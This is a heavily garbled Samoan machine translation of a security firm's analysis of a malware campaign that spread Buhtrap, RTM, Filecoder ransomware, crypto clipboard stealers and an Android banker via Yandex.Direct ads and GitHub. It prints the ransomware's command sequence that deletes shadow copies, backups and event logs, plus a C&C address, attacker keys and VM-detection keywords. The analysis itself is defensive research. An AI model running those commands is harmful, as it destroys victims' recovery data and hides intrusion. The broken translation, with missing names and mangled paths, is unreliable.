Ina ia taulaʻi i tausitusi i se osofaʻiga i luga ole laiga, e mafai ona e faʻaogaina pepa o galuega latou te suʻeina i luga ole laiga. E tusa lea ma le mea na faia e se vaega i luga ole laiga i nai masina ua tuanaʻi, tufatufaina atu o fale i tua. и , faʻapea foʻi ma faʻailoga ma polokalama faʻapipiʻi mo le gaoia o tupe crypto. O le tele o sini e maua i Rusia. O le osofaʻiga na faia e ala i le tuʻuina o faʻasalalauga leaga ile Yandex.Direct. O i latou na ono afaina na ave i luga o le upega tafaʻilagi lea na talosagaina ai i latou e laʻuina se faila leaga e faʻafoliga o se faʻataʻitaʻiga pepa. Na aveese e Yandex le faasalalauga leaga ina ua uma la matou lapataiga.
O le code source a Buhtrap ua fa'asalalau i luga ole laiga i le taimi ua tuana'i ina ia mafai e se tasi ona fa'aogaina. E leai ni a matou faʻamatalaga e uiga i le RTM code avanoa.
I lenei pou o le a matou taʻuina atu ia te oe le auala na tufatufaina atu ai e le au osofaʻi mea leaga e faʻaaoga ai Yandex.Direct ma faʻafeiloaʻi i GitHub. Ole pou ole a fa'ai'u ile su'esu'ega fa'apitoa ole malware.
Buhtrap ma le RTM ua toe foʻi i pisinisi
Faiga o le salalau ma tagata afaina
O uta eseese e tu'uina atu i tagata ua afaina e fa'atasi ai le faiga fa'asalalau masani. O faila leaga uma na faia e le au osofaʻi na tuʻuina i totonu o faleoloa GitHub eseese e lua.
E masani lava, o le faleteuoloa o lo'o i ai se faila leaga e tasi e mafai ona sii mai, lea e suia soo. Talu ai ona o le GitHub e mafai ai ona e vaʻai i le talaʻaga o suiga i se fale teu oloa, e mafai ona matou vaʻai pe o le a le mea leaga na tufatufa atu i se vaitaimi patino. Ina ia faʻamaonia le tagata manua e sii mai le faila leaga, o le upega tafaʻilagi blanki-shabloni24[.]ru, o loʻo faʻaalia i le ata o loʻo i luga, na faʻaaogaina.
O le mamanu o le saite ma igoa uma o faila leaga e mulimuli i se manatu e tasi - pepa, faʻataʻitaʻiga, konekarate, faʻataʻitaʻiga, ma isi. fuafuaga e tutusa i le tauvaga fou. Pau lava le fesili o le auala na oʻo atu ai le tagata manua i le nofoaga a le au osofaʻi.
Fa'ama'i
Le itiiti ifo i le tele o tagata afaina na iu i luga o lenei saite na tosina i faʻasalalauga leaga. Lalo o se fa'ata'ita'iga URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
E pei ona e va'ai mai i le so'otaga, sa fa'apipi'i le fu'a i luga ole fono fa'aletupe fa'aletulafono bb.f2[.]kz. E taua le maitauina o fuʻa na faʻaalia i luga o nofoaga eseese, e tutusa uma le id faʻasalalauga (blanki_rsya), ma sili ona fesoʻotaʻi ma auaunaga tau tupe poʻo fesoasoani faʻaletulafono. O le URL o loʻo faʻaalia ai na faʻaaogaina e le tagata manua le talosaga "faʻapipiʻi pepa pili," lea e lagolagoina ai lo tatou manatu o osofaʻiga faʻatatau. O lo'o i lalo nofoaga na fa'aalia ai fu'a ma fa'afesili su'esu'e.
- la'u mai le pepa o pili – bb.f2[.]kz
- fa'ata'ita'iga konekarate - Ipopen[.]ru
- fa'ata'ita'iga o fa'aseā talosaga - 77metrov[.]ru
- pepa maliliega - blank-dogovor-kupli-prodazhi[.]ru
- fa'ata'ita'iga talosaga a le fa'amasinoga - zen.yandex[.]ru
- fa'ata'ita'iga fa'asea - yurday[.]ru
- fa'ata'ita'iga pepa fa'akonekarate – Regforum[.]ru
- pepa fa'akonekarate – assistentus[.]ru
- faʻataʻitaʻiga maliliega fale - napravah[.]com
- fa'ata'ita'iga o konekarate fa'aletulafono - avito[.]ru
O le saite blanki-shabloni24[.]ru atonu na fa'atulagaina e pasi ai se su'esu'ega va'aia faigofie. E masani lava, o se fa'asalalauga e fa'asino i se 'upega tafa'ilagi fa'apolofesa fa'atasi ai ma se feso'ota'iga i GitHub e foliga mai e le o se mea leaga. E le gata i lea, na lafoina e le au osofaʻi faila leaga i le faleoloa mo naʻo se taimi faʻatapulaʻa, atonu i le taimi o le tauvaga. O le tele o taimi, o le GitHub repository o loʻo i ai se faʻamaumauga zip avanoa poʻo se faila EXE avanoa. O le mea lea, e mafai e tagata osofaʻi ona faʻasalalau faʻasalalauga e ala i Yandex.Direct i luga o saite na sili ona asia e tagata suʻesuʻe na o mai e tali atu i suʻesuʻega faʻapitoa.
O le isi, se'i o tatou va'ai i uta eseese o lo'o fa'asoa fa'apea.
Iloiloga o Totogi
Fa'asologa o le tufatufaina
O le osofaʻiga leaga na amata i le faaiuga o Oketopa 2018 ma o loʻo galue i le taimi o le tusitusi. Talu ai ona o le faleoloa atoa na avanoa lautele ile GitHub, na matou tuufaatasia se taimi saʻo o le tufatufaina atu o aiga leaga e ono (silasila i le ata i lalo). Ua matou faʻaopoopoina se laina faʻaalia le taimi na maua ai le fuʻa soʻotaga, e pei ona fuaina e le ESET telemetry, mo le faʻatusatusaina ma le git history. E pei ona mafai ona e vaʻaia, o lenei mea e fetaui lelei ma le maua o le totogi ile GitHub. O le eseesega i le faaiuga o Fepuari e mafai ona faʻamatalaina e le mea moni e leʻi i ai sa matou vaega o le talafaasolopito o suiga ona o le fale teu oloa na aveese mai GitHub ae matou te leʻi mauaina atoa.
Ata 1. Fa'asologa o le tufatufaina atu o mea leaga.
Tusi Fa'ailoga Saini
Na fa'aaogaina e le fa'asalalauga le tele o tusi pasi. O nisi na sainia e le sili atu ma le tasi le malware aiga, lea e faʻaalia atili ai o faʻataʻitaʻiga eseese e auai i le tauvaga lava e tasi. E ui i le maua o le ki tumaoti, e leʻi faʻapipiʻiina e le au faʻatautaia ia binaries ma e leʻi faʻaogaina le ki mo faʻataʻitaʻiga uma. I le faaiuga o Fepuari 2019, na amata ai e le au osofaʻi ona faia ni saini le aoga e faʻaaoga ai se tusi faamaonia a Google lea e leʻi iai a latou ki patino.
O tusi pasi uma e aofia ai i le faʻasalalauga ma aiga leaga latou te sainia o loʻo lisiina i le laulau i lalo.
Ua matou fa'aogaina fo'i nei tusi pasi saini e fa'atuina ai so'otaga ma isi aiga leaga. Mo le tele o tusi faamaonia, matou te leʻi mauaina ni faʻataʻitaʻiga e leʻi tufatufaina atu i se fale teu oloa GitHub. Ae ui i lea, o le tusi TOV "MARIYA" na faʻaaogaina e saini ai malware o loʻo i le botnet , adware ma miners. E foliga mai o lenei malware e fesoʻotaʻi ma lenei faʻasalalauga. E foliga mai, o le tusi faamaonia na faʻatau i luga o le darknet.
Win32/Filecoder.Buhtrap
O le vaega muamua na tosina atu i ai matou o le Win32/Filecoder.Buhtrap fou faatoa maua. Ole faila binary Delphi lea e faʻapipiʻiina i nisi taimi. Sa masani ona tufatufaina ia Fepuari-Mati 2019. E amio e fetaui ma se polokalame ransomware - e su'e ai ta'avale fa'apitonu'u ma faila feso'ota'iga ma fa'ailoga faila na maua. E le manaʻomia se fesoʻotaʻiga Initaneti e faʻafefeteina aua e le faʻafesoʻotaʻi le server e lafo ki faʻamatalaga. Nai lo lena, e faʻaopoopoina se "faʻailoga" i le pito o le feʻau tau, ma fautuaina le faʻaaogaina o imeli poʻo Bitmessage e faʻafesoʻotaʻi ai tagata faʻatautaia.
Ina ia fa'amauina le tele o punaoa maaleale e mafai, Filecoder.Buhtrap fa'atautaia se filo ua fuafuaina e tapuni ai polokalama autu e mafai ona tatala faila faila o loʻo i ai faʻamatalaga taua e mafai ona faʻalavelave i faʻamatalaga. O fa'agaioiga fa'atatau e fa'atatau i fa'amaumauga o fa'amaumauga (DBMS). E le gata i lea, o le Filecoder.Buhtrap e tape faila ogalaau ma faʻamaumauga e faʻalavelave ai le toe faʻaleleia o faʻamaumauga. Ina ia faia lenei mea, faʻataʻitaʻi le faʻasologa o tusitusiga i lalo.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap e faʻaaogaina se auaunaga IP Logger i luga ole laiga ua fuafuaina e aoina faʻamatalaga e uiga i tagata asiasi ile upega tafaʻilagi. O lenei mea e faʻamoemoe e siaki ai tagata na afaina i le ransomware, o le matafaioi lea a le laina faʻatonu:
mshta.exe "javascript:document.write('');"
O faila mo fa'ailoga e filifilia pe a le fetaui ma lisi fa'ate'a se tolu. Muamua, o faila e iai fa'aopoopoga nei e le'o fa'ailogaina: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ma .pea. Lona lua, o faila uma o loʻo i ai le ala atoa o loʻo i ai laina faʻatonu mai le lisi o loʻo i lalo e le aofia ai.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Tolu, o nisi igoa faila e le aofia ai mai faʻamatalaga, faatasi ai ma le igoa faila o le feʻau tau. O le lisi o loʻo tuʻuina atu i lalo. E manino lava, o nei tuusaunoaga uma e faʻamoemoe e faʻaauau pea le masini, ae faʻaitiitia le faʻaogaina o auala.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Faiga fa'ailoga faila
O le taimi lava e faʻataunuʻu ai, e faʻatupuina e le malware se 512-bit RSA key pair. O le fa'ailoga tumaoti (d) ma le modulus (n) ona fa'ailogaina lea i se fa'ailoga malo 2048-bit ki lautele (fa'asalalauga lautele ma modulus), fa'apipi'i zlib, ma fa'ailoga base64. O le code e nafa ma lenei mea o loʻo faʻaalia i le Ata 2.
Ata 2. I'uga o Hex-Rays decompilation o le 512-bit RSA key pair process generation.
O lo'o i lalo se fa'ata'ita'iga o tusitusiga manino ma se ki fa'apitoa na gaosia, o se fa'ailoga fa'apipi'i i le fe'au o le togiola.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
O loʻo tuʻuina atu i lalo le ki faʻasalalau a le au osofaʻi.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
O faila o loʻo faʻailogaina e faʻaaoga ai le AES-128-CBC ma le 256-bit key. Mo faila fa'ailoga ta'itasi, e fa'atupuina se ki fou ma se ve'a fa'ailoga fou. O faʻamatalaga autu e faʻaopoopo i le pito o le faila faʻailoga. Sei o tatou mafaufau i le faatulagaga o le faila natia.
O faila fa'ailoga e iai le ulutala lea:
O faʻamatalaga faila faila faʻatasi ai ma le faʻaopoopoga o le tau faʻailoga VEGA o loʻo faʻailogaina i le 0x5000 paita muamua. O fa'amatalaga fa'alilolilo uma o lo'o fa'apipi'i i se faila ma le fa'atulagaga nei:
- O le faʻailoga tele o faila o loʻo i ai se faʻailoga e faʻaalia ai pe sili atu le faila nai lo le 0x5000 paita i le tele
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, fa'alaua'itele ki o le RSA fa'atupu pa'aga))
- RSA ki pa'u = ZlibCompress(RSAEncrypt(fa'atupuina RSA ki fa'apitoa, fa'amalo fa'ailoga RSA lautele))
Win32/ClipBanker
Win32/ClipBanker o se vaega na tufatufa faʻafuaseʻi mai le tuai o Oketopa i le amataga o Tesema 2018. O lana matafaioi o le mataʻituina o mea o loʻo i totonu o le kilipa laupapa, e suʻe tuatusi o pusa tupe cryptocurrency. Ina ua uma ona fuafuaina le tuatusi atotupe taulaʻi, ua suia e ClipBanker i se tuatusi e talitonuina e ana le au faʻatautaia. O faʻataʻitaʻiga na matou suʻesuʻeina e leʻi faʻapipiʻiina pe faanenefu. Na o le pau lava le masini e fa'aoga e ufiufi ai amioga o le fa'ailoga o manoa. O tuatusi atotupe a le tagata faigaluega o lo'o fa'ailogaina ile RC4. O tupe fa'atatau ole Bitcoin, Bitcoin cash, Dogecoin, Ethereum ma Ripple.
I le vaitau na salalau atu ai le malware i pusa tupe a Bitcoin a le au osofaʻi, o se vaega itiiti na lafoina i le VTS, lea e masalosalo ai i le manuia o le tauvaga. E le gata i lea, e leai se faʻamaoniga e faʻaalia ai o nei fefaʻatauaiga e fesoʻotaʻi ma ClipBanker.
Win32/RTM
O le vaega Win32/RTM na tufatufaina mo ni nai aso i le amataga o Mati 2019. O le RTM o se Trojan banker na tusia i Delphi, e faʻatatau i faiga tau faletupe mamao. I le 2017, na lomia e tagata suʻesuʻe ESET o lenei polokalame, o loʻo talafeagai pea le faʻamatalaga. Ia Ianuari 2019, na tatalaina ai foi e Palo Alto Networks .
Buhtrap Loader
Mo sina taimi, na maua ai se downloader i luga ole GitHub e le tutusa ma meafaigaluega muamua a Buhtrap. Ua liliu atu i https://94.100.18[.]67/RSS.php?<some_id> ia maua le isi laasaga ma uta sa'o i le manatua. E mafai ona tatou fa'avasegaina amioga e lua o le fa'ailoga tulaga lua. I le URL muamua, na pasia sa'o e le RSS.php le Buhtrap backdoor - o lenei backdoor e tutusa lelei lava ma le mea na maua ina ua uma ona liki le source code.
O le mea e malie ai, matou te vaʻai i le tele o faʻasalalauga faʻatasi ma le Buhtrap backdoor, ma o loʻo faʻapea o loʻo faʻatautaia e tagata faʻatautaia eseese. I lenei tulaga, o le eseesega tele o le backdoor e uta saʻo i le mafaufau ma e le faʻaogaina le masani masani ma le DLL faʻaogaina o le faagasologa lea na matou talanoa ai. . E le gata i lea, na suia e le au faʻatautaia le ki RC4 na faʻaaogaina e faʻailogaina ai fefaʻatauaiga o fesoʻotaʻiga i le C&C server. I le tele o faʻasalalauga na matou vaʻaia, e leʻi faʻalavelave le au faʻalapotopotoga e sui lenei ki.
O le amio lona lua, sili atu ona lavelave o le RSS.php URL na pasi atu i se isi loader. Na fa'atinoina nisi fa'alavelave, e pei o le toe fausia o le laulau fa'aulufale mai. O le faʻamoemoega o le faʻapipiʻiina o le faʻafesoʻotaʻi le C&C server [.]com/api/F27F84EDA4D13B15/2, lafo atu ogalaau ma faatali mo se tali. E fa'agasolo le tali e pei o se pa'u, uta i le manatua ma fa'atino. O le uta na matou vaʻai i le faʻatinoina o lenei loader o le Buhtrap backdoor tutusa, ae atonu e iai isi vaega.
Android/Spy.Banker
O le mea e malie ai, o se vaega mo le Android na maua foi i le GitHub repository. Sa i ai o ia i le lala autu mo na o le tasi le aso - Novema 1, 2018. E ese mai le faʻasalalau i luga ole GitHub, ESET telemetry e leai se faʻamaoniga o lenei mea leaga o loʻo tufatufaina.
O le vaega sa talimalo o se Android Application Package (APK). Ua matua faanenefu. O le amio leaga o loʻo natia i totonu o se JAR faʻailoga o loʻo i totonu o le APK. O loʻo faʻailogaina i le RC4 faʻaaoga lenei ki:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
O le ki lava e tasi ma le algorithm o loʻo faʻaaogaina e faʻapipiʻi ai manoa. O lo'o tu le JAR i totonu APK_ROOT + image/files. O le 4 paita muamua o le faila o loʻo i ai le umi o le JAR faʻailoga, lea e amata vave pe a maeʻa le fanua umi.
Ina ua uma ona vavae le faila, na matou iloa ai o Anubis - muamua faletupe mo Android. O loʻo i ai i le malware uiga nei:
- pu'e faaleotele leo
- ave screenshots
- maua fa'amaopoopo GPS
- keylogger
- fa'ailoga fa'amatalaga o masini ma mana'oga tau fa'atau
- auina atu spam
O le mea e malie ai, na faʻaogaina e le faletupe le Twitter e fai ma fesoʻotaʻiga fesoʻotaʻiga faʻasalalau e maua ai se isi C&C server. O le faʻataʻitaʻiga na matou suʻesuʻeina na faʻaaogaina le @JonesTrader account, ae i le taimi o suʻesuʻega ua uma ona poloka.
O loʻo i ai i le faletupe se lisi o talosaga faʻatatau i luga o le masini Android. E umi atu nai lo le lisi na maua i le suʻesuʻega a Sophos. O le lisi e aofia ai le tele o talosaga faʻatupe, polokalame faʻatau i luga ole laiga e pei ole Amazon ma eBay, ma auaunaga tau tupe.
MSIL/ClipBanker.IH
O le vaega mulimuli na tufatufa atu o se vaega o lenei faʻasalalauga o le .NET Windows executable, lea na faʻaalia ia Mati 2019. O le tele o lomiga su'esu'e sa fa'apipi'iina i ConfuserEx v1.0.0. E pei o ClipBanker, o lenei vaega e faʻaaogaina le laupapa kilipa. O lana sini o le tele o ituaiga o cryptocurrencies, faʻapea foʻi ma ofo ile Steam. E le gata i lea, na te faʻaaogaina le IP Logger auaunaga e gaoi ai le Bitcoin private WIF key.
Faiga Puipuiga
I le faʻaopoopoga i faʻamanuiaga o loʻo tuʻuina atu e ConfuserEx i le puipuia o le debugging, lafoaia, ma le faʻafefe, o le vaega e aofia ai le mafai ona iloa mea antivirus ma masini masini.
Ina ia faʻamaonia o loʻo tamoʻe i totonu o se masini komepiuta, e faʻaogaina e le malware le laina faʻatonu Windows WMI (WMIC) ua fausia e talosagaina ai faʻamatalaga BIOS, e pei o:
wmic bios
Ona fa'asolo lea e le polokalame le fa'atonuga ma su'e upu autu: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Ina ia su'esu'e oloa antivirus, e auina atu e le malware se talosaga a le Windows Management Instrumentation (WMI) i le Windows Security Center e fa'aoga ai ManagementObjectSearcher API e pei ona faʻaalia i lalo. A maeʻa ona faʻavasega mai le base64 o le valaau e pei o lenei:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Ata 3. Fa'agasologa mo le fa'ailoaina o oloa antivirus.
E le gata i lea, e siaki e le malware pe , o se meafaigaluega e puipuia mai osofaʻiga laupapa ma, afai e tamoʻe, faʻagata uma filo i lena faʻagasologa, ma faʻafefe ai le puipuiga.
Tumau
O le fa'asologa o mea leaga na matou su'esu'eina e kopi lava i totonu %APPDATA%googleupdater.exe ma seti le uiga "natia" mo le google directory. Ona ia suia lea o le tau SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell i le Windows resitala ma faʻaopoopo le ala updater.exe. O le auala lea, o le a faʻataunuʻuina le malware i taimi uma e ulufale ai le tagata faʻaoga.
Amioga leaga
E pei o le ClipBanker, e mataʻituina e le malware mea o loʻo i totonu o le kilipa laupapa ma suʻe tuatusi atotupe cryptocurrency, ma a maua, suia i se tasi o tuatusi o le faʻalapotopotoga. O lo'o i lalo se lisi o tuatusi fa'atatau e fa'atatau i mea o lo'o maua i totonu ole code.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Mo ituaiga tuatusi ta'itasi o lo'o iai se fa'amatalaga masani e fetaui. O le tau STEAM_URL o loʻo faʻaaogaina e osofaʻia ai le Steam system, e pei ona mafai ona vaʻaia mai le faʻamatalaga masani o loʻo faʻaaogaina e faʻamatalaina i totonu o le paʻu:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Auala fa'amama
I le faaopoopo atu i le suia o tuatusi i totonu o le pa puipui, o loʻo taulaʻi e le malware ia ki WIF tumaoti o Bitcoin, Bitcoin Core ma Electrum Bitcoin atotupe. O lo'o fa'aogaina e le polokalame le plogger.org e avea o se auala fa'alilolilo e maua ai le ki fa'apitoa a le WIF. Ina ia faia lenei mea, e faʻapipiʻi e le aufaipisinisi faʻamatalaga autu patino i le User-Agent HTTP header, e pei ona faʻaalia i lalo.
Ata 4. IP Logger fa'amafanafanaga fa'atasi ai ma fa'amaumauga o galuega.
E le'i fa'aogaina e le aufaipisinisi le iplogger.org e aveese ai atotupe. Masalo na latou faʻaogaina se isi auala ona o le 255 amio faʻatapulaʻa i le fanua User-Agentfa'aalia i totonu o le IP Logger web interface. I faʻataʻitaʻiga na matou suʻesuʻeina, o le isi 'auʻaunaga faʻapipiʻi sa teuina i le fesuiaiga o le siosiomaga DiscordWebHook. O le mea e ofo ai, o lenei fesuiaiga o le siosiomaga e le o tuʻuina atu i soʻo se mea i totonu o le code. O lo'o ta'u mai ai o lo'o fa'atupu pea le malware ma o lo'o tu'uina atu le fesuiaiga i le masini su'e a le tagata fa'afoe.
E iai le isi fa'ailoga o lo'o fa'atupuina le polokalame. O le faila binary e aofia ai URL iplogger.org e lua, ma e fesiligia uma pe a faʻaumatia faʻamaumauga. I se talosaga i se tasi o nei URL, o le tau i le fanua Fa'asinomaga e muamua i le "DEV /". Na matou maua foi se faʻamatalaga e leʻi faʻapipiʻiina e faʻaaoga ai le ConfuserEx, o le tagata e mauaina lenei URL e igoa ia DevFeedbackUrl. Faʻavae i luga o le igoa fesuiaiga o le siosiomaga, matou te talitonu o loʻo fuafua le au faʻatautaia e faʻaoga le auaunaga faʻamaonia Discord ma lana faiga faʻaogaina i luga o le upega tafaʻilagi e gaoia atotupe cryptocurrency.
iʻuga
O lenei faʻasalalauga o se faʻataʻitaʻiga o le faʻaogaina o auaunaga faʻasalalauga faʻamaonia i osofaʻiga i luga ole laiga. O le polokalame e faʻatatau i faʻalapotopotoga a Rusia, ae matou te le ofo i le vaʻaia o sea osofaʻiga e faʻaaoga ai auaunaga e le o ni Rusia. Ina ia aloese mai le fetuutuunai, e tatau i tagata faaaoga ona mautinoa i le talaaga o le puna o le polokalama latou te sii maia.
O lo'o maua se lisi atoa o fa'ailoga o le fetuutuuna'i ma uiga MITER ATT&CK i .
puna: www.habr.com